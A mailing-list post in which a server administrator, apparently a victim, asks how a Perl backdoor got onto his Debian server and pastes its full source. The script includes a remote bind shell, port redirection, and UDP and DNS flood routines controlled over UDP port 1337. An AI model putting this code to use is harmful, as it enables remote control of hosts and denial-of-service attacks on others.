Hello, I logged in to my server today to find that /usr/sbin/ncsd was running about 50 copies, since I don't have BIND installed, obviously something was up...they were also running with the user www-data... After a little bit of research I found a new crontab entryFile: /tmp/crontab.XXXXLYukbF 0 * * * * /tmp/.nscdrecover
this starts at auth.log.0:Jun 6 17:00:01 debian PAM_unix[26934]: (cron) session opened for user www-data by (uid=0)auth.log.0:Jun 6 17:00:02 debianPAM_unix[26934]: (cron) session closed for user www-dataand runs every hour and under SYSLOG it starts syslog.3:Jun 6 16:27:27 debian crontab[26795]: (www-data) LIST (www-data)syslog.3:Jun 6 16:27:28 debiancrontab[26798]: (www-data) REPLACE (www-data)syslog.3:Jun 6 16:27:34debian crontab[26804]: (www-data) LIST (www-data)syslog.3:Jun 6 16:27:34 debiancrontab[26807]: (www-data) REPLACE (www-data)syslog.3:Jun 6 17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD (/tmp/.nscdrecover) so I found /tmp/.ncsdrecover and it looks like some kind of port scanner/trojan the contents are pasted below #!/usr/bin/perl -w $pass = "J9YcGEyNypkzI"; $str = 'Mess with the best - die like a rest!'x1337; use IO::Socket; use IO::Select; use POSIX; sub redir { my $port = shift; my $dest = shift; $SIG{ALRM} = sub { exit }; alarm 60; $sa = IO::Socket::INET->new( Proto => "tcp", Listen => 1, ReuseAddr => 1, LocalPort =>$port) or exit; $sin = $sa->accept or exit; close($sa); alarm 0; $sout = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $dest) or exit;$sin->autoflush(1); $sout->autoflush(1); $sel = IO::Select->new($sin, $sout); while(@sock = $sel->can_read(180)) { foreach $s(@sock) { $buf = <$s>; exit unless($buf); print $sout $buf if($s eq $sin); print $sin $buf if($s eq $sout); }}} sub shell { my $port = shift; $SIG{ALRM} = sub { exit }; alarm 60; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in($port, INADDR_ANY)); listen(S, 1); accept(X, S); close(S); alarm 0; open STDIN, "<&X"; open STDOUT, ">&X"; open STDERR, ">&X"; close X; exec("/bin/sh"); } sub udp { my $host = shift; my $time = shift; $sock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $host, PeerPort => int(rand 65535)) or exit; $sock->autoflush(1); $SIG{ALRM} = sub { exit }; alarm 15 unless(alarm $time); print $sock $str while(1); } } sub ddns { my $host = shift; my $time = shift; $sock = new IO::Socket::INET->new(Proto => 'udp', PeerAddr => $host, PeerPort => 53) or exit; $sock->autoflush(1); $SIG{ALRM} = sub { exit }; alarm 15 unless(alarm $time); while(1) { my $s = int(rand(89)+10); my $r1 = int(rand(89)+10); my $r2 = int(rand(89)+10); my $r3 = int(rand(89)+10); my $r4 = int(rand(89)+10); send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}} $0 = '/usr/sbin/nscd'.' 'x100; exit if fork; $SIG{ALRM} = 'IGNORE'; $SIG{TERM} = 'IGNORE'; $SIG{CHLD} = 'IGNORE'; $SIG{INT} = 'IGNORE'; $SIG{QUIT} = 'IGNORE'; $SIG{HUP} = 'IGNORE'; open STDIN, "</dev/null"; open STDOUT, ">/dev/null"; open STDERR, ">/dev/null"; POSIX::setsid(); $csock = IO::Socket::INET->new(Proto => 'udp', LocalPort => 1337, ReuseAddr => 1) or exit;while($string =<$csock>) { chop($string); my ($pw, $cmd, $arg1, $arg2) = split " ", $string; next unless($cmd); next unless($arg1); next unless(crypt($pw, $pass) eq $pass); if ($cmd eq "ping") { my $bsock = IO::Socket::INET->new(Proto => 'udp', PeerAddr => $arg1, PeerPort => $arg2, ReuseAddr => 1) or next; print $bsock "pong ".`uname -mnrs`; close $bsock; } elsif ($cmd eq "die") { exit if(crypt($arg1, $pass) eq $pass); } elsif ($cmd eq "redir") { redir($arg1, $arg2) unless(fork); } elsif ($cmd eq "shell") { shell($arg1) unless(fork); } elsif ($cmd eq "udp") { udp($arg1, $arg2) unless(fork); } elsif ($cmd eq "ddns") { ddns($arg1, $arg2) unless(fork); } } A little history is that my server was hacked with some trojan that was sending out SPAM and I did a fresh reinstall with debian so I could have automatic updates and the like. I copied over a few of the home directorys from the old site.Then this all started after a user logged in onFriday June 6th first login at 14:16 ending 14:24the script starts at 14:27 worldspe ftpd26405 pm6-s104.amazon. Fri Jun 6 15:06 - 15:06 (00:00)worldspe ftpd26325 pm6-s104.amazon. Fri Jun 6 14:51 - 14:51 (00:00)worldspe ftpd26315 pm6-s104.amazon. Fri Jun 6 14:49 - 14:49 (00:00)worldspe ftpd26291 pm6-s104.amazon. Fri Jun 6 14:43 - 14:44 (00:00)worldspe ftpd26183 pm6-s104.amazon. Fri Jun 6 14:16 - 14:24 (00:07) The question is could this of been started via a php script and if so what should I look for in order to neutralize it and communicate with this user ? I already moved the /tmp file out. While greping the php files I found nothing that had /tmp or ncsd listed in it at all. This is just kind of weird, and I was wondering if anybody could be of help. Also no other files or cgi-bin files were uploaded, so it might just be a coincidence, but my logic points to it being something that happened via something that was uploaded. I just don't know where this came from. I am running Debian 3.0 woody with all security update files. I ran rtkitchk and found nothing. So I'm really perplexed as to what could of got this script on the server. Any help would be greatly appreciated as I found nothing about this script by google. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]